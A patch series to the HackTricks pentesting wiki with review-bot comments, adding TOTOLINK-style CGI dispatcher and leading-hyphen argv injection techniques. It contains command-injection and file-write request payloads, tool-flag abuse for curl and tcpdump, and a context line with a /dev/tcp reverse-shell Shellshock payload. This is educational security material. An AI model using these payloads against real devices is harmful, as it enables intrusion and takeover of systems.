From 90afd5fcb11b6a8f4d0cac02e128294d2c05affb Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 1 Oct 2025 12:49:30 +0000 Subject: [PATCH 1/2] Add content from: TOTOLINK X6000R: Three New Vulnerabilities Uncovered --- .../pentesting-web/cgi.md | 44 ++++++++++++++++--- src/pentesting-web/command-injection.md | 41 ++++++++++++++++- src/welcome/hacktricks-values-and-faq.md | 3 +- 3 files changed, 79 insertions(+), 9 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index a3625f877..7cc8bce59 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md 
@@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > run ``` -## **Proxy \(MitM to Web server requests\)** +## Centralized CGI dispatchers (single endpoint routing via selector parameters) -CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" +Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=` to route the request to an internal function. -As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. +Methodology to exploit these routers: + +- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher. +- Test unauthenticated reachability: some handlers forget auth checks and are directly callable. +- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. + +Generic exploit shapes: + +```http +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools +topicurl=¶m=-n + +# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; + +# 3) Validator bypass → arbitrary file write in file-touching handlers +topicurl=setWizardCfg&=/etc/init.d/S99rc +``` + +Detection and hardening: + +- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers. +- Flag parameters that begin with `-` (argv option injection attempts). 
+- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags. ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) @@ -80,8 +106,14 @@ curl -i --data-binary "" "http://jh2i.com:500 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +## **Proxy \(MitM to Web server requests\)** + +CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" + +As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. + +## **References** + +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 8529062f6..e84179e05 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -158,6 +158,44 @@ execFile('/usr/bin/do-something', [ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). +### Argument/Option injection via leading hyphen (argv, no shell metacharacters) + +Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. + +Typical places where this appears: + +- Embedded web UIs/CGI handlers that build commands like `ping `, `tcpdump -i -w `, `curl `, etc. +- Centralized CGI routers (e.g., `/cgi-bin/.cgi` with a selector parameter like `topicurl=`) where multiple handlers reuse the same weak validator. + +What to try: + +- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool. +- Abuse flags that change behavior or write files, for example: + - `ping`: `-f`/`-c 100000` to stress the device (DoS) + - `curl`: `-o /tmp/x` to write arbitrary paths, `-K ` to load attacker-controlled config + - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers +- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place. 
+ +Generic PoC shapes against centralized CGI dispatchers: + +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# Flip options in a downstream tool via argv injection +topicurl=¶m=-n + +# Unauthenticated RCE when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; +``` + +Hardening and detection: + +- Reject inputs that start with `-` and enforce strict allowlists and types (IP, MAC, SSID, etc.). +- Always pass user data after a literal `--` where supported and never allow extra flags from user-controlled fields. +- Prefer safe APIs (no shell); for wrappers, construct fixed argv templates with no user-controlled flags. +- Look for unauthenticated hits to centralized CGI endpoints (e.g., `/cgi-bin/cstecgi.cgi`) with selector parameters and values beginning with `-`. + ## Brute-Force Detection List @@ -173,5 +211,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) -{{#include ../banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md 
@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} - From 5b9ec7fcd6a62609cca351cf6c8a686272ff11d5 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sat, 4 Oct 2025 11:06:35 +0200 Subject: [PATCH 2/2] Update command-injection.md --- src/pentesting-web/command-injection.md | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index e84179e05..d3e593336 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -189,13 +189,6 @@ topicurl=¶m=-n topicurl=setEasyMeshAgentCfg&agentName=;id; ``` -Hardening and detection: - -- Reject inputs that start with `-` and enforce strict allowlists and types (IP, MAC, SSID, etc.). -- Always pass user data after a literal `--` where supported and never allow extra flags from user-controlled fields. -- Prefer safe APIs (no shell); for wrappers, construct fixed argv templates with no user-controlled flags. -- Look for unauthenticated hits to centralized CGI endpoints (e.g., `/cgi-bin/cstecgi.cgi`) with selector parameters and values beginning with `-`. - ## Brute-Force Detection List 
@@ -213,4 +206,4 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) -{{#include ../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../banners/hacktricks-training.md}}
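Review bot: in the cgi.md hunk `@@ -59,11 +59,37 @@`, the `http` fenced example is not a valid request: the `# 1) ...`, `# 2) ...` and `# 3) ...` comment lines sit inside the request body after the `Content-Type` header, so anyone copying the block sends them literally, and the placeholder parameter names have been lost (`topicurl=¶m=-n` reads as `&param` mangled into the `&para;` entity, and `topicurl=setWizardCfg&=/etc/init.d/S99rc` has an empty parameter name). Suggest one request per shape, the numbered explanations moved into prose above each fence, and explicit placeholders such as `topicurl=<handler>&<param>=-n` with the angle brackets escaped so the renderer does not strip them. The `Detection and hardening:` list is the right counterweight to the exploit shapes; since the payloads arrive form-encoded, it is worth saying that the leading-`-` check must run on the decoded value.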
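Review bot: in the cgi.md hunk `@@ -80,8 +106,14 @@`, the Proxy section is re-added verbatim with its old grammar errors; since these lines are being rewritten anyway, change `CGI creates a environment variable` to `an environment variable` and join the fragment `As the HTTP_PROXY variable could be used by the web server. Try to send ...` into a single sentence (for example `Because the web server may honour the HTTP_PROXY variable, send a header ...`). The new `## **References**` heading is bold while the neighbouring `## Old PHP + CGI = RCE` heading is plain; keep heading markup consistent within the file.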
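Review bot: in the command-injection.md hunk `@@ -158,6 +158,44 @@`, several placeholders have been swallowed, leaving backticked fragments with trailing spaces: `ping `, `tcpdump -i -w `, `curl `, `/cgi-bin/.cgi` and `-K ` in the flag list. They were most likely angle-bracket tokens eaten by the HTML renderer; escape them or use another placeholder form so the reader can tell which argument position is user-controlled. The PoC fence is untagged here while the same block in cgi.md is tagged `http`, it carries the same `#` comment lines inside the request body, and the same mangled `topicurl=¶m=-n`. Since this section and the new cgi.md section share the PoC block and most of the bullets, link to one from the other instead of maintaining two copies that will drift.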
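Review bot: in the command-injection.md hunk `@@ -173,5 +211,6 @@`, the `{{#include ../banners/hacktricks-training.md}}` line changes only by losing its trailing newline (`\ No newline at end of file`), which PATCH 2/2 then has to put back; drop that part of the hunk so the include line is left untouched and the series does not churn on whitespace.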
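Review bot: in the hacktricks-values-and-faq.md hunk `@@ -48,7 +48,7 @@`, the change deletes the verb from the FAQ entry, turning `How can I cite a page of HackTricks?` into `How can I a page of HackTricks?`. This is an accidental regression unrelated to the TOTOLINK content in the commit subject; revert it.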
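Review bot: in the hacktricks-values-and-faq.md hunk `@@ -144,4 +144,3 @@`, the only change is removing a trailing blank line after the banner include. The file is not part of the commit's subject; either drop this whitespace-only change or move it into a separate cleanup commit so the content change stays reviewable on its own.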
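Review bot: in PATCH 2/2, hunk `@@ -189,13 +189,6 @@`, deleting the whole `Hardening and detection:` list leaves the argv-injection section with only attack shapes and no mitigation, while the parallel section added to cgi.md in PATCH 1/2 keeps its `Detection and hardening` bullets, so the two pages now disagree. If the goal was to avoid duplicating that list, replace it with a one-line pointer to the cgi.md section rather than dropping the only guidance on rejecting `-`-prefixed values, passing user data after `--` where supported, and preferring no-shell APIs with fixed argv templates.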
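Review bot: in PATCH 2/2, hunk `@@ -213,4 +206,4 @@`, the only change is restoring the end-of-file newline that PATCH 1/2 removed from the same `{{#include ../banners/hacktricks-training.md}}` line; squash this into the first patch so the series does not introduce and then undo the same whitespace change.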